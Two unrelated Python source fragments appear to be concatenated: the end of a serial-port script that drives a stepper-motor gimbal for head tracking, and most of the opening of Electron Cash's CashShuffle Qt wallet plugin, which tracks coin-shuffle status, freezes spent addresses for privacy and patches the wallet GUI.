if local_ra > 23 and local_ra < 180:
raLim = 23.0
elif local_ra > 180 and local_ra < 338:
raLim = 338.0
else:
raLim = local_ra
#
# if local_ra < -23:
# ra = local_ra = -23
# raiseFlag = True
# if 23 < local_ra < 180:
# raLim = 23.0
# elif 180 < local_ra < 338:
#
# raLim = 338.0
# else:
# raLim = local_ra
finally:
lock.release()
if raLim <= 90 or raLim >= 270:
raLim = np.mod(raLim + 180, 360)
pitch_newStep = (((raLim) / 180) * steps_per_rev)
pitch_lastStep = pitch_steps
pitch_steps = int(round(pitch_newStep))
pitchVec[:-1]=pitchVec[1:]
pitchVec[-1] = pitch_steps
pitch_steps = np.mean(pitchVec)
#print(time.time() - tic)
# print ra,raLim,pitch_steps
#if yaw_steps != yaw_lastStep or pitch_steps != pitch_lastStep:
# print(dec, local_ra, yaw_steps, pitch_steps, raLim)
# ser.write(struct.pack(2*'B',yaw_steps + 128,pitch_steps + 128))
if serialExist:
ser.write(struct.pack('BBB', int(round(yaw_steps)) + 128, int(round(pitch_steps)), 10))
#ser.write(struct.pack('BBB', 135, 135, 10))
# ser.write(struct.pack('BBB', yaw_steps + 128, 128, 10))
# ser.write(struct.pack('BBB', error_in_deg_h+128, error_in_deg_v, 10))
#print (error_in_deg_h,yaw_steps)
# ser.write(struct.pack('BBB', 64, pitch_steps, 10))
time.sleep(0.01)
if (serialExist):
recv = ser.read(1024).lstrip().rstrip()
if len(recv) > 0:
print(recv)
# dec = dec + 1s
# if raiseFlag:
# ra = ra + 5
# else:
# ra = ra - 5
#time.sleep(0.01)
if __name__ == '__main__':
# serialExist = False
if serialExist:
ser = serial.Serial(ArduinoCOM, baudrate=115200)
ser.timeout = 0.002
print("serial ==> " + str(ser.is_open))
time.sleep(1)
# start_new_thread(face_recognition_handle,())
# start_new_thread(cameras_handle,())
# start_new_thread(oculus_handle, ())
# start_new_thread(track_handle,())
logging.info("Main : before creating thread")
x = threading.Thread(target=oculus_handle, args=[])
#y = threading.Thread(target=camera_thread, args=[])
y = threading.Thread(target=camera_thread_better, args=[])
logging.info("Main : before running thread")
x.start()
y.start()
logging.info("Main : wait for the thread to finish")
x.join()
logging.info("Main : all done")
# while True:
# time.sleep(0.01)
|
qt.py
|
#!/usr/bin/env python3
#
# Cash Shuffle - CoinJoin for Bitcoin Cash
# Copyright (C) 2018-2019 Electron Cash LLC
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import json
import copy
import socket
import time
import threading
import queue
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash.plugins import BasePlugin, hook
from electroncash.i18n import _
from electroncash.util import print_error, profiler, PrintError, Weak, format_satoshis_plain, finalization_print_error
from electroncash.network import Network
from electroncash.address import Address
from electroncash.bitcoin import COINBASE_MATURITY
from electroncash.transaction import Transaction
from electroncash.simple_config import SimpleConfig, get_config
from electroncash.wallet import Abstract_Wallet
from electroncash_gui.qt.util import EnterButton, CancelButton, Buttons, CloseButton, HelpLabel, OkButton, rate_limited, ColorScheme, destroyed_print_error, AppModalDialog
from electroncash_gui.qt.password_dialog import PasswordDialog
from electroncash_gui.qt.main_window import ElectrumWindow
from electroncash_gui.qt.amountedit import BTCAmountEdit
from electroncash_gui.qt.utils import FixedAspectRatioSvgWidget
from electroncash_plugins.shuffle.client import BackgroundShufflingThread, ERR_SERVER_CONNECT, ERR_BAD_SERVER_PREFIX, MSG_SERVER_OK
from electroncash_plugins.shuffle.comms import query_server_for_stats, verify_ssl_socket
from electroncash_plugins.shuffle.conf_keys import ConfKeys # config keys per wallet and global
from electroncash_plugins.shuffle.coin_utils import CoinUtils
def is_coin_busy_shuffling(window, utxo_or_name):
''' Convenience wrapper for BackgroundShufflingThread.is_coin_busy_shuffling '''
bp = getattr(window, 'background_process', None)
return bool(bp and bp.is_coin_busy_shuffling(utxo_or_name))
def network_callback(window, event, *args):
''' This gets called in the network thread. It should just emit signals to GUI
if it is to do any GUI work. '''
if event == 'new_transaction':
if len(args) == 2 and hasattr(window, 'wallet') and args[1] is window.wallet and args[0]:
window._shuffle_sigs.tx.emit(window, args[0])
def my_custom_item_setup(utxo_list, item, utxo, name):
if not hasattr(utxo_list.wallet, 'is_coin_shuffled'):
return
prog = utxo_list.in_progress.get(name, "")
frozenstring = item.data(0, Qt.UserRole+1) or ""
is_reshuffle = name in utxo_list.wallet._reshuffles
u_value = utxo['value']
if not is_reshuffle and utxo_list.wallet.is_coin_shuffled(utxo): # already shuffled
item.setText(5, _("Shuffled"))
elif not is_reshuffle and utxo['address'] in utxo_list.wallet._shuffled_address_cache: # we hit the cache directly as a performance hack. we don't really need a super-accurate reply as this is for UI and the cache will eventually be accurate
item.setText(5, _("Shuffled Addr"))
elif not prog and ("a" in frozenstring or "c" in frozenstring):
item.setText(5, _("Frozen"))
elif u_value >= BackgroundShufflingThread.UPPER_BOUND: # too big
item.setText(5, _("Too big"))
elif u_value < BackgroundShufflingThread.LOWER_BOUND: # too small
item.setText(5, _("Too small"))
elif utxo['height'] <= 0: # not_confirmed
if is_reshuffle:
item.setText(5, _("Unconfirmed (reshuf)"))
else:
item.setText(5, _("Unconfirmed"))
# for now we unconditionally disallow coinbase coins. See CashShuffle issue #64
# elif utxo['coinbase'] and (utxo['height'] + COINBASE_MATURITY > utxo_list.wallet.get_local_height()): # maturity check
# item.setText(5, _("Not mature"))
elif utxo['coinbase']: # we disallow coinbase coins
item.setText(5, _("Coinbase"))
elif (u_value >= BackgroundShufflingThread.LOWER_BOUND
and u_value < BackgroundShufflingThread.UPPER_BOUND): # queued_labels
window = utxo_list.parent
if (window and window.background_process and utxo_list.wallet.network
and utxo_list.wallet.network.is_connected()):
if window.background_process.get_paused():
item.setText(5, _("Paused"))
else:
if is_reshuffle:
item.setText(5, _("In queue (reshuf)"))
else:
item.setText(5, _("In queue"))
else:
item.setText(5, _("Offline"))
if prog == 'in progress': # in progress
item.setText(5, _("In progress"))
elif prog.startswith('phase '):
item.setText(5, _("Phase {}").format(prog.split()[-1]))
elif prog == 'wait for others': # wait for others
item.setText(5, _("Wait for others"))
elif prog.startswith("got players"): # got players > 1
num, tot = (int(x) for x in prog.rsplit(' ', 2)[-2:])
txt = "{} ({}/{})".format(_("Players"), num, tot)
item.setText(5, txt)
elif prog == "completed":
item.setText(5, _("Done"))
def my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected):
''' Adds CashShuffle related actions to the utxo_list context (right-click)
menu '''
wallet = window.wallet
shuffled_selected = [name for name,flags in selected.items()
if (not flags
and wallet.is_coin_shuffled(CoinUtils.coin_name_to_dict(name))
and name not in wallet._reshuffles)]
reshuffles_selected = [name for name in selected if name in wallet._reshuffles]
menu.addSection(_('CashShuffle'))
def on_reshuffle():
wallet._reshuffles.update(set(shuffled_selected))
utxo_list.update()
def on_cancel_reshuffles():
wallet._reshuffles.difference_update(set(reshuffles_selected))
utxo_list.update()
len_shufs, len_reshufs = len(shuffled_selected), len(reshuffles_selected)
if len_shufs:
if len_shufs == 1:
action = menu.addAction(_('Reshuffle Coin'), on_reshuffle)
else:
action = menu.addAction(_('Reshuffle {} Shuffled').format(len_shufs), on_reshuffle)
if len_reshufs:
if len_reshufs == 1:
action = menu.addAction(_('Cancel Reshuffle'), on_cancel_reshuffles)
else:
action = menu.addAction(_('Cancel {} Reshuffles').format(len_reshufs), on_cancel_reshuffles)
def _make_label(window, tot, shufamt, chg, fee, scale):
is_dusty_fee = not chg and fee - BackgroundShufflingThread.FEE > 0
# satoshis -> display format
tot, shufamt, chg = window.format_amount(tot), window.format_amount(shufamt), window.format_amount(chg) if chg else ''
chgtxt = " + {} ".format(chg) if chg else " "
# Note it's important that the "Shuffle" prefix not be translated because we use it elsewhere
# in the filter shuffle history callback... and it's also a "proper name" :)
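# Resulting label shape (illustrative): "Shuffle <tot> <unit> <arrow> <shufamt> [+ <chg>] (-<fee> sats fee)"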
return ( "Shuffle" + (" {} {} {} {}{}(-{} sats {})"
.format(tot, window.base_unit(),
BackgroundShufflingThread.SCALE_ARROW_DICT.get(scale, BackgroundShufflingThread.SCALE_ARROW_UNKNOWN),
shufamt, chgtxt, fee, _("fee") if not is_dusty_fee else _("dusty fee")
)
)
)
def update_coin_status(window, coin_name, msg):
if getattr(window.utxo_list, "in_progress", None) is None:
return
#print_error("[shuffle] wallet={}; Coin {} Message '{}'".format(window.wallet.basename(), coin_name, msg.strip()))
prev_in_progress = window.utxo_list.in_progress.get(coin_name)
new_in_progress = prev_in_progress
msg = msg or '' # force str
coin_name = coin_name or '' # force str
if coin_name not in ("MAINLOG", "PROTOCOL"):
if msg.startswith("Player"):
if "get session number" in msg:
new_in_progress = 'wait for others'
elif 'joined the pool' in msg:
try:
num = int(msg.split(' ', 2)[1])
if num > 1:
# got more players than just self
new_in_progress = 'got players {} {}'.format(num, window.background_process.poolSize)
except (ValueError, IndexError):
pass
elif "begins CoinShuffle protocol" in msg:
new_in_progress = 'in progress'
elif "reaches phase" in msg:
pos = msg.find("reaches phase")
parts = msg[pos:].split(' ', 2)
try:
phase = int(parts[2])
new_in_progress = 'phase {}'.format(phase)
except (IndexError, ValueError):
pass
elif msg.endswith("complete protocol"):
new_in_progress = "completed" # NB: these don't leak. they eventually get cleaned up by the 'forget ' command from the background thread after some time
elif msg.startswith("Error"):
new_in_progress = None # flag to remove from progress list
if ERR_SERVER_CONNECT in msg or ERR_BAD_SERVER_PREFIX in msg:
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif msg.startswith("Blame") and "insufficient" not in msg and "wrong hash" not in msg:
new_in_progress = None
elif msg.startswith("shuffle_txid:"): # TXID message -- call "set_label"
words = msg.split()
label = _("CashShuffle") # fallback on parse error
if len(words) >= 2:
txid = words[1]
try:
tot, shufamt, chg, fee, scale = [int(w) for w in words[2:7]] # parse satoshis
label = _make_label(window, tot, shufamt, chg, fee, scale)
except (IndexError, ValueError, TypeError) as e:
# Hmm. Some sort of parse error. We'll label it 'CashShuffle'
window.print_error("*** WARNING: Could not parse shuffle_txid message:", str(e), msg)
window.wallet.set_label(txid, label)
Plugin._increment_shuffle_counter(window)
window.update_wallet()
elif msg.startswith("add_tentative_shuffle:"):
# add_tentative_shuffle: utxo outaddr tot shufamt chg fee scale (field order as parsed below)
# This mechanism is a workaround for issue #70 -- it's possible for the last player to delay and cause other players to miss the txid.
try:
words = msg.split()
utxo, addr = words[1:3]
tot, shufamt, chg, fee, scale = [int(x) for x in words[3:8]] # parse satoshis
window._shuffle_tentative[utxo] = (addr, tot, shufamt, chg, fee, scale) # remember this tentative shuffle so we can generate a label for it if we see a matching tx come in later
except (IndexError, ValueError, TypeError) as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse add_tentative_shuffle message:", str(e), msg)
elif msg.startswith("del_tentative_shuffle:"):
try:
utxo = msg.split()[1]
window._shuffle_tentative.pop(utxo, None) # tolerate del commands for missing values from dict
except IndexError as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse del_tentative_shuffle message:", str(e), msg)
if not msg.startswith("Error") and not msg.startswith("Exit"):
window.cashshuffle_set_flag(0) # 0 means ok
elif new_in_progress != 'completed' and prev_in_progress == new_in_progress: # "Exit" or "Error"
# thread exit or error without completing protocol, set status back to 'in queue'
# -- fixes wrong status of 'in progress' and 'waiting for others' being shown in UI for dead threads
new_in_progress = None
else:
if msg == "stopped":
window.utxo_list.in_progress.clear(); new_in_progress = prev_in_progress = None
elif msg.startswith("forget "):
words = msg.strip().split()
prev_in_progress = 1; new_in_progress = None; coin_name = words[-1] # force the code below to pop the coin that we were asked to forget from the status dict
elif ERR_SERVER_CONNECT in msg:
new_in_progress = None # flag to remove from progress list
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif MSG_SERVER_OK in msg:
new_in_progress = None
window.cashshuffle_set_flag(0) # server is ok now.
if prev_in_progress != new_in_progress:
if new_in_progress is None:
window.utxo_list.in_progress.pop(coin_name, None)
else:
window.utxo_list.in_progress[coin_name] = new_in_progress
window.utxo_list.update()
def _got_tx_check_tentative_shuffles(window, tx):
''' GUI thread: Got a new transaction for a window, so see if we should
apply the shuffle_tentative label to it. The below mechanism is a
workaround for bug #70. '''
t = getattr(window, '_shuffle_tentative', None)
if not t:
# Most of the time this code path is taken as the dict is usually empty.
# It only ever has entries when a shuffle failed at phase 4.
return
inputs, outputs = tx.inputs(), tx.outputs()
for utxo, info in t.copy().items():
# loop through all of the "tentative tx's" we have. this dict should be very small,
# it only contains entries for shuffles that timed out in phase 4 where last player took too long (bug #70)
addr, tot, amt, chg, fee, scale = info
for txin in inputs:
if CoinUtils.get_name(txin) == utxo:
# found the coin in the incoming tx. Now make sure it's our anticipated shuffle tx that failed and not some other tx, so we apply the correct label only when it's the phase-4-failed shuffle tx.
for n, txout in enumerate(outputs):
# Search the outputs of this tx to make sure they match what we expected for scale, out_addr...
typ, _addr, amount = txout
# the below checks make sure it matches what we expected from the failed shuffle, and also that the coin is shuffled (paranoia check).
if isinstance(_addr, Address) and amount == amt and _addr.to_storage_string() == addr:
txid = tx.txid()
if CoinUtils.is_coin_shuffled(window.wallet, {'prevout_hash':txid, 'prevout_n':n, 'address':_addr, 'value':amount}, {txid: tx}):
# all checks pass -- we successfully recovered from bug #70! Hurray!
window.wallet.set_label(txid, _make_label(window, tot, amt, chg, fee, scale))
Plugin._increment_shuffle_counter(window)
window.print_error("CashShuffle: found coin {} in tentative shuffle cache, applied label".format(utxo))
window.update_wallet()
else:
# hmm. this branch is very very unlikely.
window.print_error("CashShuffle: found coin {} in shuffle cache, but its tx is not a shuffle tx; label not applied".format(utxo))
break
else:
# This coin was spent in this tx, but it appears to not be the tx we anticipated.. Last player didn't broadcast and we spent it later (perhaps as a re-shuffle or other).
window.print_error("CashShuffle: removing spent coin {} from tentative shuffle cache, label not applied".format(utxo))
t.pop(utxo) # unconditionally remove this tentative coin from the dict since either way it's spent
return
def _got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx):
''' Freeze address after spending from a shuffled coin address for privacy (issue #100).
Also remove any shuffled coin spends from the _is_shuffled_cache. '''
inputs = tx.inputs()
addrs_to_freeze = set()
coins_to_purge_from_shuffle_cache = list()
coins_to_purge_from_reshuffles = set()
wallet = window.wallet
all_addresses = None
def is_mine(a):
''' This is faster than calling wallet.is_mine on *each* input,
as that involves rebuilding the address list for every call.
We also use a set here, which is faster than an O(n) list lookup.
This is a significant speedup on huge tx's with many inputs. '''
nonlocal all_addresses
if all_addresses is None:
all_addresses = set(wallet.get_addresses())
return a in all_addresses
for inp in inputs:
addr = inp['address']
if isinstance(addr, Address) and is_mine(addr):
# This coin was ours, purge True/False results from the
# _is_shuffled_cache for this coin.
name = CoinUtils.get_name(inp)
coins_to_purge_from_shuffle_cache.append(name)
coins_to_purge_from_reshuffles.add(name)
if addr not in addrs_to_freeze and wallet.is_coin_shuffled(inp):
# We spent a shuffled coin belonging to us.
# Freeze that address to protect privacy.
addrs_to_freeze.add(addr)
if addrs_to_freeze:
change_addr_set = set(wallet.get_change_addresses())
addrs_to_freeze2 = addrs_to_freeze & change_addr_set # we *ONLY* freeze if change address. see #1291
if addrs_to_freeze2:
wallet.set_frozen_state(addrs_to_freeze2, True)
for addr in addrs_to_freeze2:
name = addr.to_storage_string()
if not wallet.labels.get(name): # only put a label in there if no label there already
wallet.set_label(name, _("Shuffled coin spent (frozen for privacy)"))
# the below is to prevent the "is_shuffled_cache" from growing forever which
# impacts performance and wastes memory. Since we were checking a seen TX
# anyway, might as well expire coins from the cache that were spent.
# remove_from_shufflecache acquires locks as it operates on the cache.
CoinUtils.remove_from_shufflecache(wallet, coins_to_purge_from_shuffle_cache)
# "forget" that these addresses were designated as shuffled addresses.
CoinUtils.remove_from_shuffled_address_cache(wallet, addrs_to_freeze)
wallet._reshuffles.difference_update(coins_to_purge_from_reshuffles)
def _got_tx(window, tx):
''' Generic callback to monitor tx's received for a wallet. Note that
if this is called the tx definitely is for this window/wallet. '''
if not hasattr(window, '_shuffle_patched_'):
# defensive programming in case this signal arrives late
# just as the user was disabling cash shuffle
# (signal arrives via QueuedConnection which is why this check is necessary)
return
_got_tx_check_tentative_shuffles(window, tx) # check for workaround to bug#70
_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx) # Feature #100
# Note at this point the is_shuffled cache has had entries for inputs in
# the tx above removed. If you want to add checks to this function that
# involve the _is_shuffled_cache, do it above before the
# '_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc' call.
class MsgForwarder(QObject):
''' Forwards messages from BackgroundShufflingThread to the GUI thread using
Qt signal magic. See function update_coin_status above. '''
gotMessage = pyqtSignal(str, str)
def __init__(self, window):
super().__init__(None)
self.window = window
self.gotMessage.connect(self.gotMsgSlot)
def send(self, msg, sender):
self.gotMessage.emit(msg, sender)
def gotMsgSlot(self, msg, sender):
update_coin_status(self.window, sender, msg)
def disconnectAll(self):
try:
self.gotMessage.disconnect()
except:
pass
def start_background_shuffling(window, network_settings, period = 10.0, password = None, timeout = 60.0):
logger = MsgForwarder(window)
window.background_process = BackgroundShufflingThread(window,
window.wallet,
network_settings,
logger = logger,
period = period,
password = password,
timeout = timeout)
window.background_process.start()
def monkey_patches_apply(window):
def patch_window(window):
if getattr(window, '_shuffle_patched_', None):
return
window.background_process = None
window.send_tab_shuffle_extra = SendTabExtra(window)
window._shuffle_tentative = dict()
class Sigs(QObject):
tx = pyqtSignal(QObject, object)
window._shuffle_sigs = sigs = Sigs(window)
sigs.tx.connect(_got_tx)
window._shuffle_network_callback = lambda event, *args: network_callback(window, event, *args)
if window.network:
window.network.register_callback(window._shuffle_network_callback, ['new_transaction'])
window._shuffle_patched_ = True
window.force_use_single_change_addr = _("CashShuffle is enabled: change address logic will be handled by CashShuffle (to preserve privacy).")
print_error("[shuffle] Patched window")
def patch_utxo_list(utxo_list):
if getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
header_labels.append(_("Shuffle status"))
utxo_list.update_headers(header_labels)
utxo_list.in_progress = dict()
utxo_list._shuffle_patched_ = True
print_error("[shuffle] Patched utxo_list")
def patch_wallet(wallet):
if getattr(wallet, '_shuffle_patched_', None):
return
wallet.is_coin_shuffled = lambda coin, txs=None: CoinUtils.is_coin_shuffled(wallet, coin, txs)
wallet.get_shuffled_and_unshuffled_coins = lambda *args, **kwargs: CoinUtils.get_shuffled_and_unshuffled_coins(wallet, *args, **kwargs)
wallet.cashshuffle_get_new_change_address = lambda for_shufflethread=False: CoinUtils.get_new_change_address_safe(wallet, for_shufflethread=for_shufflethread)
wallet._is_shuffled_cache = dict()
wallet._shuffled_address_cache = set()
wallet._addresses_cashshuffle_reserved = set()
wallet._reshuffles = set()
wallet._last_change = None
CoinUtils.load_shuffle_change_shared_with_others(wallet) # sets wallet._shuffle_change_shared_with_others
# Paranoia -- force wallet into this single change address mode in case
# other code (plugins, etc) generate tx's. We don't want tx generation
# code to clobber our shuffle tx output addresses.
change_addr_policy_1 = (bool(wallet.storage.get('use_change')), bool(wallet.storage.get('multiple_change')))
change_addr_policy_2 = (bool(wallet.use_change), bool(wallet.multiple_change))
desired_policy = (True, False)
if any(policy != desired_policy for policy in (change_addr_policy_1, change_addr_policy_2)):
wallet.use_change, wallet.multiple_change = desired_policy
wallet.storage.put('use_change', desired_policy[0])
wallet.storage.put('multiple_change', desired_policy[1])
wallet.print_error("CashShuffle forced change address policy to: use_change={}, multiple_change={}"
.format(desired_policy[0], desired_policy[1]))
# More paranoia -- in case app crashed, unfreeze coins frozen by last
# app run.
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
wallet._shuffle_patched_ = True
print_error("[shuffle] Patched wallet")
patch_wallet(window.wallet)
patch_utxo_list(window.utxo_list)
patch_window(window)
def monkey_patches_remove(window):
def restore_window(window):
if not getattr(window, '_shuffle_patched_', None):
return
if window.network:
window.network.unregister_callback(window._shuffle_network_callback)
delattr(window, '_shuffle_network_callback')
try: window._shuffle_sigs.tx.disconnect()
except TypeError: pass
window._shuffle_sigs.deleteLater()
delattr(window, "_shuffle_sigs")
delattr(window, '_shuffle_tentative')
window.send_tab_shuffle_extra.setParent(None); window.send_tab_shuffle_extra.deleteLater();
delattr(window, 'send_tab_shuffle_extra')
delattr(window, 'background_process')
delattr(window, '_shuffle_patched_')
window.force_use_single_change_addr = None
print_error("[shuffle] Unpatched window")
# Note that at this point an additional monkey patch: 'window.__disabled_sendtab_extra__' may stick around until the plugin is unloaded altogether
def restore_utxo_list(utxo_list):
if not getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
del header_labels[-1]
utxo_list.update_headers(header_labels)
utxo_list.in_progress = None
delattr(utxo_list, "in_progress")
delattr(utxo_list, '_shuffle_patched_')
print_error("[shuffle] Unpatched utxo_list")
def restore_wallet(wallet):
if not getattr(wallet, '_shuffle_patched_', None):
return
delattr(wallet, '_addresses_cashshuffle_reserved')
delattr(wallet, 'cashshuffle_get_new_change_address')
delattr(wallet, "is_coin_shuffled")
delattr(wallet, "get_shuffled_and_unshuffled_coins")
delattr(wallet, "_is_shuffled_cache")
delattr(wallet, "_shuffled_address_cache")
delattr(wallet, '_shuffle_patched_')
delattr(wallet, "_last_change")
delattr(wallet, "_reshuffles")
CoinUtils.store_shuffle_change_shared_with_others(wallet) # save _shuffle_change_shared_with_others to storage -- note this doesn't call storage.write() for performance reasons.
delattr(wallet, '_shuffle_change_shared_with_others')
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
print_error("[shuffle] Unpatched wallet")
restore_window(window)
restore_utxo_list(window.utxo_list)
restore_wallet(window.wallet)
def _elide(x, maxlen=30, startlen=8):
''' Useful for eliding GUI text with an ellipsis ... in the middle '''
if len(x) > maxlen and startlen + 3 < maxlen:
return x[:startlen] + "..." + x[-(maxlen-startlen-3):]
return x
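# Example (illustrative): with the defaults maxlen=30, startlen=8,
#   _elide("abcdefghijklmnopqrstuvwxyz0123456789") == "abcdefgh...rstuvwxyz0123456789"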
class Plugin(BasePlugin):
instance = None # The extant instance singleton, if any. Variable is cleared on plugin stop.
gui = None # The "gui object" singleton (ElectrumGui) -- a useful reference to keep around.
network_dialog = None # The NetworkDialog window singleton (managed by the ElectrumGui singleton).
def fullname(self):
return 'CashShuffle'
def description(self):
return _("CashShuffle Protocol")
def is_available(self):
return True
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.windows = []
self.disabled_windows = [] # this is to manage the "cashshuffle disabled" xtra gui element in the send tab
self._hide_history_txs = False
self.initted = False
def is_defunct(self):
return Plugin.instance is not self
@hook
def init_qt(self, gui):
if self.initted:
return
self.print_error("Initializing...")
Plugin.instance = self
Plugin.gui = gui
self._delete_old_keys(gui.config)
if Plugin.network_dialog != gui.nd:
Plugin.network_dialog = gui.nd # each time we are stopped, our module gets re-imported and we lose globals... so try and recapture this singleton
ct = 0
for window in gui.windows:
self.on_new_window(window)
ct += 1
self.on_network_dialog(Plugin.network_dialog) # If we have a network dialog, add self to the network dialog
self.initted = True
self._hide_history_txs = bool(gui.config.get(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, False))
self.print_error("Initialized (had {} extant windows).".format(ct))
self._hide_history_txs_check()
@hook
def on_network_dialog(self, nd):
Plugin.network_dialog = nd
if not nd: return
self.print_error("OnNetworkDialog", str(nd))
if not hasattr(nd, "__shuffle_settings__") or not nd.__shuffle_settings__:
nd.__shuffle_settings__ = st = SettingsTab(parent=nd.nlayout.tabs, config=nd.nlayout.config)
nd.nlayout.tabs.addTab(st, _("CashShuffle"))
st.applyChanges.connect(Plugin.try_to_apply_network_dialog_settings)
elif nd.__shuffle_settings__:
# the tab may be showing a stale view if the last settings weren't applied; refresh the view
st = nd.__shuffle_settings__
st.refreshFromSettings()
def show_cashshuffle_tab_in_network_dialog(self, window):
window.gui_object.show_network_dialog(window)
nd = Plugin.network_dialog
if nd and getattr(nd, '__shuffle_settings__', None):
st = nd.__shuffle_settings__
nd.nlayout.tabs.setCurrentWidget(st)
nd.activateWindow()
return True
return False
def del_network_dialog_tab(self):
# delete the shuffle settings widget
if Plugin.network_dialog and hasattr(Plugin.network_dialog, '__shuffle_settings__'):
nd = Plugin.network_dialog
st = Plugin.network_dialog.__shuffle_settings__
if st:
idx = nd.nlayout.tabs.indexOf(st)
if idx > -1:
if nd.nlayout.tabs.currentIndex() == idx:
nd.nlayout.tabs.setCurrentIndex(0)
nd.nlayout.tabs.removeTab(idx)
st.kill()
st.setParent(None)
st.deleteLater() # need to call this otherwise it sticks around :/
st = None
Plugin.network_dialog.__shuffle_settings__ = None
self.print_error("Removed CashShuffle network settings tab")
def window_has_cashshuffle(self, window):
return window in self.windows
def window_wants_cashshuffle(self, window):
return window.wallet.storage.get(ConfKeys.PerWallet.ENABLED, False)
def window_set_wants_cashshuffle(self, window, b):
window.wallet.storage.put(ConfKeys.PerWallet.ENABLED, bool(b))
def window_set_cashshuffle(self, window, b):
if not b and self.window_has_cashshuffle(window):
self._disable_for_window(window)
elif b and not self.window_has_cashshuffle(window):
self._enable_for_window(window)
self.window_set_wants_cashshuffle(window, b)
def _window_set_disabled_extra(self, window):
self._window_clear_disabled_extra(window)
window.__disabled_sendtab_extra__ = SendTabExtraDisabled(window)
def _window_clear_disabled_extra(self, window):
extra = getattr(window, "__disabled_sendtab_extra__", None)
if extra:
extra.setParent(None) # python will gc this badboy
delattr(window, "__disabled_sendtab_extra__")
del extra # hopefully object refct goes immediately to 0 and this widget dies quickly.
return True
@hook
def on_new_window(self, window):
if not window.is_wallet_cashshuffle_compatible():
# wallet is watching-only, multisig, or hardware, so mark it permanently as not using cashshuffle
self.window_set_cashshuffle(window, False)
window.update_status() # this has the side-effect of refreshing the cash shuffle status bar button's context menu (which has actions even for disabled/incompatible windows)
return
if window.wallet and not self.window_has_cashshuffle(window):
if self.window_wants_cashshuffle(window):
self._enable_for_window(window) or self._window_add_to_disabled(window)
else:
self._window_add_to_disabled(window)
def _enable_for_window(self, window):
name = window.wallet.basename()
self.print_error("Window '{}' registered, performing window-specific startup code".format(name))
if window.gui_object.warn_if_no_secp(
parent=window,
message=_("CashShuffle requires libsecp; cannot enable shuffling for this wallet."),
icon=QMessageBox.Critical):
self.print_error("Refusing to enable CashShuffle for window '{}' because no libsecp :(".format(name))
return
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
cached_password = window.gui_object.get_cached_password(window.wallet)
password = None
while window.wallet.has_password():
msg = _("CashShuffle requires access to '{}'.").format(name) + "\n" + _('Please enter your password')
if cached_password:
password = cached_password
cached_password = None
else:
pwdlg = PasswordDialog(parent=window.top_level_window(), msg=msg)
password = pwdlg.run()
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if password is None:
# User cancelled password input
if not self.warn_if_shuffle_disable_not_ok(window, msg=_('CashShuffle will now be <i>disabled</i> for a wallet which has previously had it <b>enabled</b>. Are you sure?')):
# User was warned and opted to try again to enable
continue
self.window_set_cashshuffle(window, False)
window.show_error(_("CashShuffle password prompt canceled; disabling for this wallet."), parent=window)
return
try:
window.wallet.check_password(password)
break
except Exception as e:
window.show_error(str(e), parent=window)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
continue
network_settings = Plugin.get_network_settings(window.config)
if not network_settings:
network_settings = self.settings_dialog(window, msg=_("Please choose a CashShuffle server"), restart_ask = False)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if not network_settings:
self.window_set_cashshuffle(window, False)
window.show_error(_("Can't get network, disabling CashShuffle."), parent=window)
return
self._delete_old_keys(window.wallet)
self._window_remove_from_disabled(window)
network_settings = copy.deepcopy(network_settings)
network_settings['host'] = network_settings.pop('server')
monkey_patches_apply(window)
self.windows.append(window)
self._increment_session_counter(window)
window.update_status()
window.utxo_list.update()
start_background_shuffling(window, network_settings, password=password)
return True
@hook
def utxo_list_item_setup(self, utxo_list, item, x, name):
my_custom_item_setup(utxo_list, item, x, name)
@hook
def utxo_list_context_menu_setup(self, utxo_list, menu, selected):
window = utxo_list.parent
if window in self.windows:
my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected)
@hook
def history_list_filter(self, history_list, h_item, label):
if self._hide_history_txs:
return bool(label.startswith("Shuffle ") # this string is not translated for performance reasons. _make_label also does not translate this string.
and ( any( x for x in BackgroundShufflingThread.SCALE_ARROWS
if x in label )
or BackgroundShufflingThread.SCALE_ARROW_UNKNOWN in label
)
)
return None
@hook
def history_list_context_menu_setup(self, history_list, menu, item, tx_hash):
# NB: We unconditionally create this menu if the plugin is loaded because
